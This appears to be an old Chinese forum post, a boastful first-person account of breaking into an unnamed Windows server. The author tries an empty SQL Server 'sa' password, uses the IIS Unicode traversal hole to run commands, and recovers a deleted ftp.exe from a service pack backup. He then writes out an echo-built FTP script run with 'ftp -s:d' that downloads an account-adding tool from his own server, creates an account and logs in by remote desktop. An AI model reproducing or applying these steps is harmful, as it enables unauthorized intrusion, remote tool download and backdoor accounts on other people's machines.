序言
如果说黑U漏洞的站有手气背的,大概都比不上我。
第一章
找到一台破机器,看着他开了21、80、135、139、1433、3389
心想蛮好破的,本来没什么兴趣,先用sql客户端连接,sa空密码试试。。。。
居然设置了密码,这个网管的智商可能大于40,呵呵,再看看U之类的喽。。。。
扫描结果显示有U,3389登录上去发现没有输入法漏洞,faint,我还真不知道这service pack怎么能打出这副样子出来,照说打了之后应该没有U漏洞啊。。。。
随便敲个dir+c:\tftp*+/s,等了半天(这机器很烂),居然没有,估计是被尼姆达搞得不行了,才出此烂招,f\*\*!!!
为了快一点,dir+c:\winnt\system32\ftp.exe,没有!!faint!!!
连这个都删??!!比我还变态。。。真没折了?那我的扫描记录留在那里多危险啊!!
靠,这么变态的网管,搞他没商量!!!
想了3秒种,得出了一个结论:
。。。。。。。。。。
其实FTP.exe是存在的~~,在哪里呢?
第二章
呣呣~~,他不是爱打services pack吗?凭他这么智障的网管,肯定忘记了在service pack有一个备份,微软为我们考虑得还挺周到啊,哈哈哈哈
吸取教训,直接整个硬盘查找,慢就慢点吧
dir c:\ftp.exe /s,果然在service pack下面有这个鸟文件,copy过来。。。
好了,echo open xxx.xxx.xxx.xxx >d 连接到我的ftp服务器(我不会告诉你的~~)
echo xxxxxx >>d 我的帐号,当然也不会告诉你
echo xxxxxx >>d 我的密码,你认为我会告诉你吗?
echo bin >>d 为什么?你们想想吧,反正加上不会遇到麻烦
echo get xxxxx >>d 方法太烂,不好意思告诉你,反正是可以用来加帐号的东西就行
echo bye >>d 礼貌一点,和我得FTP服务器说byebye
OK,
ftp -s:d
等着吧,一会儿功夫,报告cgi error,不管他,dir。。。。
shit !!!没有传过来,难道我的服务器....????
连接上我的服务器看看,一切正常啊,
type d ,也很正常啊,怎么回事情?
ping 目标,发现速度奇慢,我大概知道怎么回事情了!!!
改写d!!!
echo open xxxxx >d
echo asdfasdf >>d
echo adsfasdf >>d
echo user xxxxx >>d
echo xxxxx >>d
echo bin >>d
echo get xxxx >>d
echo bye >>d
OK
ftp -s:d
这次好了,原因不明
连接进去,加帐号,然后3389进去。。。。
